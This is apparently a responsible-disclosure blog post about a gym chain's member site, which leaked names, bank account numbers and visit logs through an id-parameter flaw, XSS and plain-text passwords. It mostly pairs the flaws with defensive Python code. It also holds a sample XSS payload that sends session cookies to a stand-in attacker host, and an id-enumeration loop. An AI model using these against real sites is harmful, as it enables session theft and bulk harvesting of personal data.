Case #7: Fitness center chain was leaking personal info

Is your gym telling on you? It sure was telling on me and my fellow members. Everything from contact info to pictures to bank account numbers to the time people enter the gym was leaking for a long, long time.

Published: Mon, September 25, 2017, 07:15
Security Monday
Information leak
OWASP 2013 A3
OWASP 2013 A7

tl;dr

A fitness center chain consisting of three centers was leaking the members' names, e-mail addresses, phone numbers, pictures, bank account numbers, logs of all visits, etc. They are still running vulnerable server software.

Summary

Who: Energi Treningssenter
Severity level: High
Reported: April 2017
Reception and handling: Good
Status: Partially fixed
Reward: A thank you
Issue: All kinds of personal info was leaked

Background

Energi Treningssenter at Askøy is an excellent fitness center. It's modern, big and has all the equipment you want. I used to train there for a while, so I had - and still have - access to the member site where you can see your personal details, payment history and a full log of your visits.

Some years ago I noticed that the picture taken for the key card to the gym was publicly available. Just by knowing the URL you could iterate through the images of all the members without being logged in. I never bothered to report it back then. When I started considering this article series I remembered the issue with the pictures and wondered whether my personal data was safe. The whole site had much the same feel as the completely vulnerable PHP site I wrote about earlier.

Approach (technical stuff)

I logged in to the gym's site while having the browser development tools open. I looked for anything out of the ordinary in the HTTP calls and in the source code.

No encryption

The first thing that hit me was that every URL is http, not https. Even the form that submits the username and password goes over an unencrypted connection.

The secrets of the source

I spotted three links to an ASP page that was hidden with CSS (display: none;).

The ASP page looked like it let you change database fields for any user, but since I couldn't even change my own data I'm not sure what it was for. However, the page was vulnerable to XSS. That is a good opportunity to steal the session cookie, which seems to work perfectly fine across IP addresses. Or the injected script could simply make the victim's browser send his or her personal data directly.
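To make the XSS point concrete, here is an added example (my own illustration, not code from the gym's site or its vendor) of the two halves of the problem: a page that concatenates a stored field straight into its HTML, beside the same page with output encoding, and a session cookie set so that injected script cannot read it. The stored name, the page template and the attacker host are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample value (not real member data): a "name" field an attacker has
# saved through an edit page, carrying a script that ships document.cookie off-site.
STORED_NAME = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'

# Hypothetical page template standing in for the member details page.
PAGE = "<h1>Account</h1><p>Name: {name}</p>"


def render_vulnerable(name):
    """Drops the stored value into the page unchanged; the browser runs the script."""
    return PAGE.format(name=name)


def render_fixed(name):
    """Encodes the value for an HTML text context, so '<script>' becomes '&lt;script&gt;'."""
    return PAGE.format(name=html.escape(name, quote=True))


def session_cookie_header(token):
    """Builds a Set-Cookie value for the session id.

    HttpOnly keeps the cookie out of document.cookie (so the payload above gets nothing),
    Secure keeps it off plain http, and SameSite=Lax limits cross-site sending.
    """
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="").strip()


if __name__ == "__main__":
    print(render_vulnerable(STORED_NAME))
    print(render_fixed(STORED_NAME))
    print("Set-Cookie:", session_cookie_header("example-session-token"))
```

The cookie flags only stop the cookie from being copied; script running in the victim's page can still make requests in the victim's session and post the returned personal data anywhere it likes, which is why the output encoding is the actual fix and the cookie flags are the safety net. Binding the session to an IP address, which the site does not do either, would be a weaker mitigation again: it breaks for mobile users and does nothing against a script that acts from the victim's own browser.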

The source also revealed the use of some kind of "add-on" for file upload. Is it possible to upload code that can be executed? I hope not. I wasn't able to tell for sure, but there were indeed web forms for uploading all kinds of files.

Known vulnerabilities

There seem to be three different servers involved in serving the site. The headers and the default error pages reveal outdated server software with known vulnerabilities. However, as I've stated in the background for these posts, that is out of scope for now.

Plain text passwords

When you log in you are told whether the username you entered exists or not. If you use the "Forgot password" function you are told whether the e-mail address you entered is known or not. And the e-mail you receive is not for resetting the password; it simply contains both the username and the password, which means the site keeps the password itself rather than a hash of it. Fail x 3.
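As an added example (my own code, not the gym's or the vendor's), here is what the three things above look like done right: passwords stored as salted scrypt hashes, a login that gives the same answer and takes the same time whether the username exists or not, and a "Forgot password" flow that always returns the same message and sends a single-use, expiring token instead of the password. The in-memory stores, the cost parameters and the 15-minute token lifetime are assumptions for the example; the token is returned from request_reset only so the example can be run offline, where a real site would put it in the e-mail and nowhere else.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed in-memory stores, hypothetical stand-ins for the member database.
USERS = {}          # username -> {"email", "salt", "digest"}
RESET_TOKENS = {}   # sha256(token) -> (username, expiry timestamp)

RESET_TTL_SECONDS = 15 * 60
GENERIC_LOGIN_ERROR = "Wrong username or password."
GENERIC_RESET_MESSAGE = "If that address is registered, a reset link has been sent."

# scrypt cost: N=2^14, r=8 needs about 16 MiB per guess, which slows offline cracking of a dump.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
DUMMY_SALT = b"\x00" * 16  # used only to burn time for unknown usernames


def hash_password(password, salt=None):
    """Returns (salt, digest); a fresh random salt per password unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P)
    return salt, digest


def register(username, email, password):
    salt, digest = hash_password(password)
    USERS[username] = {"email": email, "salt": salt, "digest": digest}


def login(username, password):
    """Returns (ok, message). Unknown user and wrong password are indistinguishable."""
    record = USERS.get(username)
    if record is None:
        hash_password(password, DUMMY_SALT)  # same cost as a real check, so timing doesn't leak
        return False, GENERIC_LOGIN_ERROR
    _, digest = hash_password(password, record["salt"])
    if not hmac.compare_digest(digest, record["digest"]):
        return False, GENERIC_LOGIN_ERROR
    return True, "Welcome."


def request_reset(email, now=None):
    """Always answers with the same message; only the e-mailed token (if any) differs."""
    now = time.time() if now is None else now
    username = next((u for u, r in USERS.items() if r["email"] == email), None)
    token = None
    if username is not None:
        token = secrets.token_urlsafe(32)
        # Store only a hash of the token: a database dump must not yield usable reset links.
        key = hashlib.sha256(token.encode("utf-8")).hexdigest()
        RESET_TOKENS[key] = (username, now + RESET_TTL_SECONDS)
    return GENERIC_RESET_MESSAGE, token


def redeem_reset(token, new_password, now=None):
    """Consumes the token (single use), rejects expired ones, and re-hashes the new password."""
    now = time.time() if now is None else now
    entry = RESET_TOKENS.pop(hashlib.sha256(token.encode("utf-8")).hexdigest(), None)
    if entry is None:
        return False
    username, expires_at = entry
    if now > expires_at:
        return False
    salt, digest = hash_password(new_password)
    USERS[username].update(salt=salt, digest=digest)
    return True


if __name__ == "__main__":
    register("12345", "member@example.invalid", "correct horse")
    print(login("12345", "correct horse"), login("12345", "nope"), login("no-such-user", "nope"))
    message, token = request_reset("member@example.invalid")
    print(message, "token sent:", token is not None)
    print(request_reset("nobody@example.invalid"))
    print(redeem_reset(token, "new password"), redeem_reset(token, "again"))
```

With passwords stored this way the "Forgot password" e-mail cannot contain the password even if someone wanted it to, which is the real test of whether a site stores passwords in plain text.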

The lucky guess

The page with all the personal details doesn't take any ID in the URL, but that doesn't mean I couldn't try adding one. I tried account.asp?id=<some ID>, and voilà, I got access to other users' personal details. The ID was an incremental integer, so by iterating it one could seemingly get everyone's name, e-mail address, phone number, bank account number, payment history and full visit log.
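The bug above is an insecure direct object reference: the handler is happy to accept an id from the query string and never asks whether the logged-in member owns it. Here is an added example (my own illustration, not the site's code) of that handler pattern, the two ways to fix it, and the enumeration loop that turns a guessable sequential id into a full dump. The member records, customer numbers and session store are constructed for the example.

```python
import secrets

# Constructed sample records (not real member data), keyed by the sequential customer number.
MEMBERS = {
    1001: {"name": "Member A", "email": "a@example.invalid", "bank_account": "0000 00 00001"},
    1002: {"name": "Member B", "email": "b@example.invalid", "bank_account": "0000 00 00002"},
    1005: {"name": "Member C", "email": "c@example.invalid", "bank_account": "0000 00 00005"},
}
SESSIONS = {}  # opaque session token -> customer number of the logged-in member


def login(customer_number):
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = customer_number
    return token


def account_vulnerable(query, session_token):
    """The pattern described in the post: logged in, and an optional ?id= that is trusted as-is."""
    if session_token not in SESSIONS:
        return None
    try:
        customer_number = int(query.get("id", SESSIONS[session_token]))
    except ValueError:
        return None
    return MEMBERS.get(customer_number)


def account_fixed(query, session_token):
    """'My account' page: the subject is always the session owner; any supplied id is ignored."""
    customer_number = SESSIONS.get(session_token)
    if customer_number is None:
        return None
    return MEMBERS.get(customer_number)


def account_by_id_fixed(query, session_token, is_staff=False):
    """An endpoint that genuinely needs an id (say, for staff): look it up, then enforce ownership."""
    owner = SESSIONS.get(session_token)
    if owner is None or "id" not in query:
        return None
    try:
        requested = int(query["id"])
    except ValueError:
        return None
    if requested != owner and not is_staff:
        return None  # a 403 in a real handler; don't reveal whether the id exists
    return MEMBERS.get(requested)


def enumerate_ids(handler, session_token, start, stop):
    """What the 'lucky guess' becomes once ids are sequential: walk the range and keep the hits."""
    found = {}
    for candidate in range(start, stop):
        record = handler({"id": str(candidate)}, session_token)
        if record is not None:
            found[candidate] = record["name"]
    return found


if __name__ == "__main__":
    token = login(1001)
    print("vulnerable:", enumerate_ids(account_vulnerable, token, 1000, 1010))
    print("fixed:     ", enumerate_ids(account_fixed, token, 1000, 1010))
    print("by id:     ", enumerate_ids(account_by_id_fixed, token, 1000, 1010))
```

Against the vulnerable handler one session and ten requests recover every record in the range; against either fixed handler the attacker only ever gets their own. Sequential ids are not the bug, the missing ownership check is, but while they stay sequential a burst of requests for consecutive ids from one session is an easy thing to alert on in the access log.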

Security issues

A lot of personal data of previous and current members was leaked:

  • Customer number (also used as username)
  • Full name
  • E-mail address
  • Phone number
  • Bank account number
  • Picture
  • Not fixed: Log of all visits
  • Full payment history

In addition there are quite a few issues that are probably still leaving the customer data vulnerable:

  • Not fixed: There's no encryption - not even when logging in
  • Not fixed: Passwords are stored in plain text
  • Not fixed: "Forgot password" e-mail contains both username and password
  • Not fixed: Cross Site Scripting
  • Not fixed: Old application server with known vulnerabilities
  • Not fixed: Old ASP.NET version with known vulnerabilities

I believe that these issues have been around for many years.

Reception and handling

Day zero

At night I sent an e-mail describing the information leak and my general concerns about the solution.

Just 1.5 hours later I got a reply saying that the issue had been forwarded to the right party.

Day 22

I received an e-mail saying that the vendor of the system had fixed the issue. I can see that the information leak has been closed, but everything else is still the same.

Conclusion

This is yet another example of our personal data in the wild. There are countless security vulnerabilities out there. You should assume that anyone who wants to, knows everything about you and everything you do. And companies that have these types of vulnerabilities won't tell you when they become aware of them.

And to start connecting the dots between the cases I'm presenting: do you remember two weeks ago, when you could see the bank account balance using just the bank account number? Well, wasn't it nice that this case gave you that bank account number?

Looking at the old versions of the software running on these sites I would definitely guess that the data is still vulnerable.
